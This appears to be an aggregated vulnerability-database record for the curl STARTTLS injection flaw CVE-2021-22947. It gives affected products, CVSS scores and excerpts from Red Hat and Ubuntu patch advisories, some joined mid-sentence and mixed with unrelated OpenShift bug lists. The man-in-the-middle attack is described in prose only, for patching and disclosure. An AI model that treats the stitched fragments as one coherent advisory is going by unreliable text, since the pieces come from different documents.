Ubuntu 21.04: curl 7.74.0-1ubuntu2.3 libcurl3-gnutls 7.74.0-1ubuntu2.3 libcurl3-nss 7.74.0-1ubuntu2.3 libcurl4 7.74.0-1ubuntu2.3
Ubuntu 20.04 LTS: curl 7.68.0-1ubuntu2.7 libcurl3-gnutls 7.68.0-1ubuntu2.7 libcurl3-nss 7.68.0-1ubuntu2.7 libcurl4 7.68.0-1ubuntu2.7
Ubuntu 18.04 LTS: curl 7.58.0-2ubuntu3.15 libcurl3-gnutls 7.58.0-2ubuntu3.15 libcurl3-nss 7.58.0-2ubuntu3.15 libcurl4 7.58.0-2ubuntu3.15
In general, a standard system update will make all the necessary changes. Bugs fixed (https://bugzilla.redhat.com/):
1983596 - CVE-2021-34558 golang: crypto/tls: certificate of wrong type is causing TLS client to panic 1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet 1997017 - unprivileged client fails to get guest agent data 1998855 - Node drain: Sometimes source virt-launcher pod status is Failed and not Completed 2000251 - RoleBinding and ClusterRoleBinding brought in by kubevirt does not get reconciled when kind is ServiceAccount 2001270 - [VMIO] [Warm from Vmware] Snapshot files are not deleted after Successful Import 2001281 - [VMIO] [Warm from VMware] Source VM should not be turned ON if vmio import is removed 2001901 - [4.8.3] NNCP creation failures after nmstate-handler pod deletion 2007336 - 4.8.3 containers 2007776 - Failed to Migrate Windows VM with CDROM (readonly) 2008511 - [CNV-4.8.3] VMI is in LiveMigrate loop when Upgrading Cluster from 2.6.7/4.7.32 to OCP 4.8.13 2012890 - With descheduler during multiple VMIs migrations, some VMs are restarted 2025475 - [4.8.3] Upgrade from 2.6 to 4.x versions failed due to vlan-filtering issues 2026881 - [4.8.3] vlan-filtering is getting applied on veth ports
- Summary:
The Migration Toolkit for Containers (MTC) 1.5.2 is now available. Description:
The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):
2000734 - CVE-2021-3757 nodejs-immer: prototype pollution may lead to DoS or remote code execution 2005438 - Combining Rsync and Stunnel in a single pod can degrade performance (1.5 backport) 2006842 - MigCluster CR remains in "unready" state and source registry is inaccessible after temporary shutdown of source cluster 2007429 - "oc describe" and "oc log" commands on "Migration resources" tree cannot be copied after failed migration 2022017 - CVE-2021-3948 mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC)
- Description:
Red Hat OpenShift Serverless release of the OpenShift Serverless Operator.
Security Fix(es):
- golang: net/http/httputil: panic due to racy read of persistConn after handler panic (CVE-2021-36221)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):
1995656 - CVE-2021-36221 golang: net/http/httputil: panic due to racy read of persistConn after handler panic 2016256 - Release of OpenShift Serverless Eventing 1.19.0 2016258 - Release of OpenShift Serverless Serving 1.19.0
5
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core binding support function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.3"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "eq",
"trust": 1.0,
"vendor": "splunk",
"version": "9.1.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core console",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.2.0"
},
{
"_id": null,
"model": "communications cloud native core service communication proxy",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.15.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "11.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.6"
},
{
"_id": null,
"model": "sinec infrastructure network services",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "1.0.1.1"
},
{
"_id": null,
"model": "communications cloud native core network function cloud native environment",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.10.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.0"
},
{
"_id": null,
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.2.0"
},
{
"_id": null,
"model": "mysql server",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.26"
},
{
"_id": null,
"model": "communications cloud native core security edge protection proxy",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.1"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "33"
},
{
"_id": null,
"model": "mysql server",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "5.7.0"
},
{
"_id": null,
"model": "communications cloud native core network slice selection function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.8.0"
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "12.3"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.0"
},
{
"_id": null,
"model": "curl",
"scope": "gte",
"trust": 1.0,
"vendor": "haxx",
"version": "7.20.0"
},
{
"_id": null,
"model": "mysql server",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.12"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.58"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "35"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.57"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.59"
},
{
"_id": null,
"model": "communications cloud native core binding support function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.11.0"
},
{
"_id": null,
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.2"
},
{
"_id": null,
"model": "solidfire baseboard management controller",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "curl",
"scope": "lt",
"trust": 1.0,
"vendor": "haxx",
"version": "7.79.0"
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mysql server",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "5.7.35"
},
{
"_id": null,
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.15.0"
},
{
"_id": null,
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.15.1"
},
{
"_id": null,
"model": "commerce guided search",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.3.2"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-22947"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "166714"
},
{
"db": "PACKETSTORM",
"id": "165209"
},
{
"db": "PACKETSTORM",
"id": "166279"
},
{
"db": "PACKETSTORM",
"id": "165135"
},
{
"db": "PACKETSTORM",
"id": "165099"
},
{
"db": "PACKETSTORM",
"id": "165053"
}
],
"trust": 0.7
},
"cve": "CVE-2021-22947",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2021-22947",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-381421",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.2,
"id": "CVE-2021-22947",
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-22947",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-381421",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-381421"
},
{
"db": "NVD",
"id": "CVE-2021-22947"
}
]
},
"description": {
"_id": null,
"data": "When curl \u003e= 7.20.0 and \u003c= 7.78.0 connects to an IMAP or POP3 server to retrieve data using STARTTLS to upgrade to TLS security, the server can respond and send back multiple responses at once that curl caches. curl would then upgrade to TLS but not flush the in-queue of cached responses but instead continue using and trustingthe responses it got *before* the TLS handshake as if they were authenticated.Using this flaw, it allows a Man-In-The-Middle attacker to first inject the fake responses, then pass-through the TLS traffic from the legitimate server and trick curl into sending data back to the user thinking the attacker\u0027s injected data comes from the TLS-protected server. A STARTTLS protocol injection flaw via man-in-the-middle was found in curl prior to 7.79.0. Such multiple \"pipelined\" responses are cached by curl. \nOver POP3 and IMAP an attacker can inject fake response data. Relevant releases/architectures:\n\n.NET Core on Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64\n.NET Core on Red Hat Enterprise Linux Server (v. 7) - x86_64\n.NET Core on Red Hat Enterprise Linux Workstation (v. 7) - x86_64\n\n3. Description:\n\n.NET Core is a managed-software framework. It implements a subset of the\n.NET framework APIs and several new APIs, and it includes a CLR\nimplementation. \n\nSecurity Fix(es):\n\n* curl: Leak of authentication credentials in URL via automatic Referer\n(CVE-2021-22876)\n\n* curl: Bad connection reuse due to flawed path name checks\n(CVE-2021-22924)\n\n* curl: Requirement to use TLS not properly enforced for IMAP, POP3, and\nFTP protocols (CVE-2021-22946)\n\n* curl: Server responses received before STARTTLS processed after TLS\nhandshake (CVE-2021-22947)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Package List:\n\n.NET Core on Red Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nrh-dotnet31-curl-7.61.1-22.el7_9.src.rpm\n\nx86_64:\nrh-dotnet31-curl-7.61.1-22.el7_9.x86_64.rpm\nrh-dotnet31-curl-debuginfo-7.61.1-22.el7_9.x86_64.rpm\nrh-dotnet31-libcurl-7.61.1-22.el7_9.x86_64.rpm\nrh-dotnet31-libcurl-devel-7.61.1-22.el7_9.x86_64.rpm\n\n.NET Core on Red Hat Enterprise Linux Server (v. 7):\n\nSource:\nrh-dotnet31-curl-7.61.1-22.el7_9.src.rpm\n\nx86_64:\nrh-dotnet31-curl-7.61.1-22.el7_9.x86_64.rpm\nrh-dotnet31-curl-debuginfo-7.61.1-22.el7_9.x86_64.rpm\nrh-dotnet31-libcurl-7.61.1-22.el7_9.x86_64.rpm\nrh-dotnet31-libcurl-devel-7.61.1-22.el7_9.x86_64.rpm\n\n.NET Core on Red Hat Enterprise Linux Workstation (v. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.2.10 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. \n\nClusters and applications are all visible and managed from a single console\n\u2014 with security policy built in. Bugs fixed (https://bugzilla.redhat.com/):\n\n2004944 - CVE-2021-23440 nodejs-set-value: type confusion allows bypass of CVE-2019-10747\n2006009 - CVE-2021-3795 semver-regex: inefficient regular expression complexity\n2013652 - RHACM 2.2.10 images\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: OpenShift Container Platform 4.10.3 security update\nAdvisory ID: RHSA-2022:0056-01\nProduct: Red Hat OpenShift Enterprise\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:0056\nIssue date: 2022-03-10\nCVE Names: CVE-2014-3577 CVE-2016-10228 CVE-2017-14502 \n CVE-2018-20843 CVE-2018-1000858 CVE-2019-8625 \n CVE-2019-8710 CVE-2019-8720 CVE-2019-8743 \n CVE-2019-8764 CVE-2019-8766 CVE-2019-8769 \n CVE-2019-8771 CVE-2019-8782 CVE-2019-8783 \n CVE-2019-8808 CVE-2019-8811 CVE-2019-8812 \n CVE-2019-8813 CVE-2019-8814 CVE-2019-8815 \n CVE-2019-8816 CVE-2019-8819 CVE-2019-8820 \n CVE-2019-8823 CVE-2019-8835 CVE-2019-8844 \n CVE-2019-8846 CVE-2019-9169 CVE-2019-13050 \n CVE-2019-13627 CVE-2019-14889 CVE-2019-15903 \n CVE-2019-19906 CVE-2019-20454 CVE-2019-20807 \n CVE-2019-25013 CVE-2020-1730 CVE-2020-3862 \n CVE-2020-3864 CVE-2020-3865 CVE-2020-3867 \n CVE-2020-3868 CVE-2020-3885 CVE-2020-3894 \n CVE-2020-3895 CVE-2020-3897 CVE-2020-3899 \n CVE-2020-3900 CVE-2020-3901 CVE-2020-3902 \n CVE-2020-8927 CVE-2020-9802 CVE-2020-9803 \n CVE-2020-9805 CVE-2020-9806 CVE-2020-9807 \n CVE-2020-9843 CVE-2020-9850 CVE-2020-9862 \n CVE-2020-9893 CVE-2020-9894 CVE-2020-9895 \n CVE-2020-9915 CVE-2020-9925 CVE-2020-9952 \n CVE-2020-10018 CVE-2020-11793 CVE-2020-13434 \n CVE-2020-14391 CVE-2020-15358 CVE-2020-15503 \n CVE-2020-25660 CVE-2020-25677 CVE-2020-27618 \n CVE-2020-27781 CVE-2020-29361 CVE-2020-29362 \n CVE-2020-29363 CVE-2021-3121 CVE-2021-3326 \n CVE-2021-3449 CVE-2021-3450 CVE-2021-3516 \n CVE-2021-3517 CVE-2021-3518 CVE-2021-3520 \n CVE-2021-3521 CVE-2021-3537 CVE-2021-3541 \n CVE-2021-3733 CVE-2021-3749 CVE-2021-20305 \n CVE-2021-21684 CVE-2021-22946 CVE-2021-22947 \n CVE-2021-25215 CVE-2021-27218 CVE-2021-30666 \n CVE-2021-30761 CVE-2021-30762 CVE-2021-33928 \n CVE-2021-33929 CVE-2021-33930 CVE-2021-33938 \n CVE-2021-36222 CVE-2021-37750 CVE-2021-39226 \n CVE-2021-41190 CVE-2021-43813 CVE-2021-44716 \n CVE-2021-44717 CVE-2022-0532 CVE-2022-21673 \n CVE-2022-24407 \n=====================================================================\n\n1. Summary:\n\nRed Hat OpenShift Container Platform release 4.10.3 is now available with\nupdates to packages and images that fix several bugs and add enhancements. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.10.3. See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHSA-2022:0055\n\nSpace precludes documenting all of the container images in this advisory. \nSee the following Release Notes documentation, which will be updated\nshortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html\n\nSecurity Fix(es):\n\n* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index\nvalidation (CVE-2021-3121)\n* grafana: Snapshot authentication bypass (CVE-2021-39226)\n* golang: net/http: limit growth of header canonicalization cache\n(CVE-2021-44716)\n* nodejs-axios: Regular expression denial of service in trim function\n(CVE-2021-3749)\n* golang: syscall: don\u0027t close fd 0 on ForkExec error (CVE-2021-44717)\n* grafana: Forward OAuth Identity Token can allow users to access some data\nsources (CVE-2022-21673)\n* grafana: directory traversal vulnerability (CVE-2021-43813)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.10.3-x86_64\n\nThe image digest is\nsha256:7ffe4cd612be27e355a640e5eec5cd8f923c1400d969fd590f806cffdaabcc56\n\n(For s390x architecture)\n\n $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.10.3-s390x\n\nThe image digest is\nsha256:4cf21a9399da1ce8427246f251ae5dedacfc8c746d2345f9cfe039ed9eda3e69\n\n(For ppc64le architecture)\n\n $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.10.3-ppc64le\n\nThe image digest is\nsha256:4ee571da1edf59dfee4473aa4604aba63c224bf8e6bcf57d048305babbbde93c\n\nAll OpenShift Container Platform 4.10 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html\n\n3. Solution:\n\nFor OpenShift Container Platform 4.10 see the following documentation,\nwhich will be updated shortly for this release, for moderate instructions\non how to upgrade your cluster and fully apply this asynchronous errata\nupdate:\n\nhttps://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1808240 - Always return metrics value for pods under the user\u0027s namespace\n1815189 - feature flagged UI does not always become available after operator installation\n1825034 - e2e: Mock CSI tests fail on IBM ROKS clusters\n1826225 - edge terminated h2 (gRPC) connections need a haproxy template change to work correctly\n1860774 - csr for vSphere egress nodes were not approved automatically during cert renewal\n1878106 - token inactivity timeout is not shortened after oauthclient/oauth config values are lowered\n1878925 - \u0027oc adm upgrade --to ...\u0027 rejects versions which occur only in history, while the cluster-version operator supports history fallback\n1880738 - origin e2e test deletes original worker\n1882983 - oVirt csi driver should refuse to provision RWX and ROX PV\n1886450 - Keepalived router id check not documented for RHV/VMware IPI\n1889488 - The metrics endpoint for the Scheduler is not protected by RBAC\n1894431 - Router pods fail to boot if the SSL certificate applied is missing an empty line at the bottom\n1896474 - Path based routing is broken for some combinations\n1897431 - CIDR support for additional network attachment with the bridge CNI plug-in\n1903408 - NodePort externalTrafficPolicy does not work for ovn-kubernetes\n1907433 - Excessive logging in image operator\n1909906 - The router fails with PANIC error when stats port already in use\n1911173 - [MSTR-998] Many charts\u0027 legend names show {{}} instead of words\n1914053 - pods assigned with Multus whereabouts IP get stuck in ContainerCreating state after node rebooting. \n1916169 - a reboot while MCO is applying changes leaves the node in undesirable state and MCP looks fine (UPDATED=true)\n1917893 - [ovirt] install fails: due to terraform error \"Cannot attach Virtual Disk: Disk is locked\" on vm resource\n1921627 - GCP UPI installation failed due to exceeding gcp limitation of instance group name\n1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation\n1926522 - oc adm catalog does not clean temporary files\n1927478 - Default CatalogSources deployed by marketplace do not have toleration for tainted nodes. \n1928141 - kube-storage-version-migrator constantly reporting type \"Upgradeable\" status Unknown\n1928285 - [LSO][OCS][arbiter] OCP Console shows no results while in fact underlying setup of LSO localvolumeset and it\u0027s storageclass is not yet finished, confusing users\n1931594 - [sig-cli] oc --request-timeout works as expected fails frequently on s390x\n1933847 - Prometheus goes unavailable (both instances down) during 4.8 upgrade\n1937085 - RHV UPI inventory playbook missing guarantee_memory\n1937196 - [aws ebs csi driver] events for block volume expansion may cause confusion\n1938236 - vsphere-problem-detector does not support overriding log levels via storage CR\n1939401 - missed labels for CMO/openshift-state-metric/telemeter-client/thanos-querier pods\n1939435 - Setting an IPv6 address in noProxy field causes error in openshift installer\n1939552 - [sig-api-machinery] CustomResourcePublishOpenAPI [Privileged:ClusterAdmin] works for CRD preserving unknown fields in an embedded object [Conformance] [Suite:openshift/conformance/parallel/minimal] [Suite:k8s]\n1942913 - ThanosSidecarUnhealthy isn\u0027t resilient to WAL replays. \n1943363 - [ovn] CNO should gracefully terminate ovn-northd\n1945274 - ostree-finalize-staged.service failed while upgrading a rhcos node to 4.6.17\n1948080 - authentication should not set Available=False APIServices_Error with 503s\n1949262 - Prometheus Statefulsets should have 2 replicas and hard affinity set\n1949672 - [GCP] Update 4.8 UPI template to match ignition version: 3.2.0\n1950827 - [LSO] localvolumediscoveryresult name is not friendly to customer\n1952576 - csv_succeeded metric not present in olm-operator for all successful CSVs\n1953264 - \"remote error: tls: bad certificate\" logs in prometheus-operator container\n1955300 - Machine config operator reports unavailable for 23m during upgrade\n1955489 - Alertmanager Statefulsets should have 2 replicas and hard affinity set\n1955490 - Thanos ruler Statefulsets should have 2 replicas and hard affinity set\n1955544 - [IPI][OSP] densed master-only installation with 0 workers fails due to missing worker security group on masters\n1956496 - Needs SR-IOV Docs Upstream\n1956739 - Permission for authorized_keys for core user changes from core user to root when changed the pull secret\n1956776 - [vSphere] Installer should do pre-check to ensure user-provided network name is valid\n1956964 - upload a boot-source to OpenShift virtualization using the console\n1957547 - [RFE]VM name is not auto filled in dev console\n1958349 - ovn-controller doesn\u0027t release the memory after cluster-density run\n1959352 - [scale] failed to get pod annotation: timed out waiting for annotations\n1960378 - icsp allows mirroring of registry root - install-config imageContentSources does not\n1960674 - Broken test: [sig-imageregistry][Serial][Suite:openshift/registry/serial] Image signature workflow can push a signed image to openshift registry and verify it [Suite:openshift/conformance/serial]\n1961317 - storage ClusterOperator does not declare ClusterRoleBindings in relatedObjects\n1961391 - String updates\n1961509 - DHCP daemon pod should have CPU and memory requests set but not limits\n1962066 - Edit machine/machineset specs not working\n1962206 - openshift-multus/dhcp-daemon set should meet platform requirements for update strategy that have maxUnavailable update of 10 or 33 percent\n1963053 - `oc whoami --show-console` should show the web console URL, not the server api URL\n1964112 - route SimpleAllocationPlugin: host name validation errors: spec.host: Invalid value: ... must be no more than 63 characters\n1964327 - Support containers with name:tag@digest\n1964789 - Send keys and disconnect does not work for VNC console\n1965368 - ClusterQuotaAdmission received non-meta object - message constantly reported in OpenShift Container Platform 4.7\n1966445 - Unmasking a service doesn\u0027t work if it masked using MCO\n1966477 - Use GA version in KAS/OAS/OauthAS to avoid: \"audit.k8s.io/v1beta1\" is deprecated and will be removed in a future release, use \"audit.k8s.io/v1\" instead\n1966521 - kube-proxy\u0027s userspace implementation consumes excessive CPU\n1968364 - [Azure] when using ssh type ed25519 bootstrap fails to come up\n1970021 - nmstate does not persist its configuration due to overlay systemd-connections-merged mount\n1970218 - MCO writes incorrect file contents if compression field is specified\n1970331 - [sig-auth][Feature:SCC][Early] should not have pod creation failures during install [Suite:openshift/conformance/parallel]\n1970805 - Cannot create build when docker image url contains dir structure\n1972033 - [azure] PV region node affinity is failure-domain.beta.kubernetes.io instead of topology.kubernetes.io\n1972827 - image registry does not remain available during upgrade\n1972962 - Should set the minimum value for the `--max-icsp-size` flag of `oc adm catalog mirror`\n1973447 - ovn-dbchecker peak memory spikes to ~500MiB during cluster-density run\n1975826 - ovn-kubernetes host directed traffic cannot be offloaded as CT zone 64000 is not established\n1976301 - [ci] e2e-azure-upi is permafailing\n1976399 - During the upgrade from OpenShift 4.5 to OpenShift 4.6 the election timers for the OVN north and south databases did not change. \n1976674 - CCO didn\u0027t set Upgradeable to False when cco mode is configured to Manual on azure platform\n1976894 - Unidling a StatefulSet does not work as expected\n1977319 - [Hive] Remove stale cruft installed by CVO in earlier releases\n1977414 - Build Config timed out waiting for condition 400: Bad Request\n1977929 - [RFE] Display Network Attachment Definitions from openshift-multus namespace during OCS deployment via UI using Multus\n1978528 - systemd-coredump started and failed intermittently for unknown reasons\n1978581 - machine-config-operator: remove runlevel from mco namespace\n1979562 - Cluster operators: don\u0027t show messages when neither progressing, degraded or unavailable\n1979962 - AWS SDN Network Stress tests have not passed in 4.9 release-openshift-origin-installer-e2e-aws-sdn-network-stress-4.9\n1979966 - OCP builds always fail when run on RHEL7 nodes\n1981396 - Deleting pool inside pool page the pool stays in Ready phase in the heading\n1981549 - Machine-config daemon does not recover from broken Proxy configuration\n1981867 - [sig-cli] oc explain should contain proper fields description for special types [Suite:openshift/conformance/parallel]\n1981941 - Terraform upgrade required in openshift-installer to resolve multiple issues\n1982063 - \u0027Control Plane\u0027 is not translated in Simplified Chinese language in Home-\u003eOverview page\n1982498 - Default registry credential path should be adjusted to use containers/auth.json for oc commands\n1982662 - Workloads - DaemonSets - Add storage: i18n misses\n1982726 - kube-apiserver audit logs show a lot of 404 errors for DELETE \"*/secrets/encryption-config\" on single node clusters\n1983758 - upgrades are failing on disruptive tests\n1983964 - Need Device plugin configuration for the NIC \"needVhostNet\" \u0026 \"isRdma\"\n1984592 - global pull secret not working in OCP4.7.4+ for additional private registries\n1985073 - new-in-4.8 ExtremelyHighIndividualControlPlaneCPU fires on some GCP update jobs\n1985486 - Cluster Proxy not used during installation on OSP with Kuryr\n1985724 - VM Details Page missing translations\n1985838 - [OVN] CNO exportNetworkFlows does not clear collectors when deleted\n1985933 - Downstream image registry recommendation\n1985965 - oVirt CSI driver does not report volume stats\n1986216 - [scale] SNO: Slow Pod recovery due to \"timed out waiting for OVS port binding\"\n1986237 - \"MachineNotYetDeleted\" in Pending state , alert not fired\n1986239 - crictl create fails with \"PID namespace requested, but sandbox infra container invalid\"\n1986302 - console continues to fetch prometheus alert and silences for normal user\n1986314 - Current MTV installation for KubeVirt import flow creates unusable Forklift UI\n1986338 - error creating list of resources in Import YAML\n1986502 - yaml multi file dnd duplicates previous dragged files\n1986819 - fix string typos for hot-plug disks\n1987044 - [OCPV48] Shutoff VM is being shown as \"Starting\" in WebUI when using spec.runStrategy Manual/RerunOnFailure\n1987136 - Declare operatorframework.io/arch.* labels for all operators\n1987257 - Go-http-client user-agent being used for oc adm mirror requests\n1987263 - fsSpaceFillingUpWarningThreshold not aligned to Kubernetes Garbage Collection Threshold\n1987445 - MetalLB integration: All gateway routers in the cluster answer ARP requests for LoadBalancer services IP\n1988406 - SSH key dropped when selecting \"Customize virtual machine\" in UI\n1988440 - Network operator changes ovnkube-config too early causing ovnkube-master pods to crashloop during cluster upgrade\n1988483 - Azure drop ICMP need to frag FRAG when using OVN: openshift-apiserver becomes False after env runs some time due to communication between one master to pods on another master fails with \"Unable to connect to the server\"\n1988879 - Virtual media based deployment fails on Dell servers due to pending Lifecycle Controller jobs\n1989438 - expected replicas is wrong\n1989502 - Developer Catalog is disappearing after short time\n1989843 - \u0027More\u0027 and \u0027Show Less\u0027 functions are not translated on several page\n1990014 - oc debug \u003cpod-name\u003e does not work for Windows pods\n1990190 - e2e testing failed with basic manifest: reason/ExternalProvisioning waiting for a volume to be created\n1990193 - \u0027more\u0027 and \u0027Show Less\u0027 is not being translated on Home -\u003e Search page\n1990255 - Partial or all of the Nodes/StorageClasses don\u0027t appear back on UI after text is removed from search bar\n1990489 - etcdHighNumberOfFailedGRPCRequests fires only on metal env in CI\n1990506 - Missing udev rules in initramfs for /dev/disk/by-id/scsi-* symlinks\n1990556 - get-resources.sh doesn\u0027t honor the no_proxy settings 